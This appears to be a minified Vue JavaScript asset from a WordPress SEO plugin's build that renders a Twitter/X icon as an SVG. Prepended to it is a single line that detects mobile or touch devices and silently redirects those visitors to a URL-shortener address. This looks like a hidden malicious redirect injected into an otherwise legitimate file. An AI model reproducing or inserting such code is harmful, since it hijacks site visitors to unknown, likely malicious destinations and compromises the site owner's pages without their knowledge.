(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as o}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as r,i as e,j as n}from"./vendor-vue-ui.232c7c36.js";const s={},c={xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",width:"24",height:"24",fill:"none","xmlns:v":"https://vecta.io/nano",class:"aioseo-icon-twitter"};function l(i,t){return r(),e("svg",c,[...t[0]||(t[0]=[n("circle",{cx:"12",cy:"12",r:"12",fill:"currentColor"},null,-1),n("g",null,[n("path",{d:"M13.129 11.076L17.588 6H16.5315L12.658 10.4065L9.5665 6H6L10.676 12.664L6 17.9865H7.0565L11.1445 13.332L14.41 17.9865H17.9765L13.129 11.076ZM11.6815 12.7225L11.207 12.0585L7.4375 6.78H9.0605L12.1035 11.0415L12.576 11.7055L16.531 17.2445H14.908L11.6815 12.7225Z",fill:"white"})],-1)])])}const p=o(s,[["render",l]]);export{p as S};
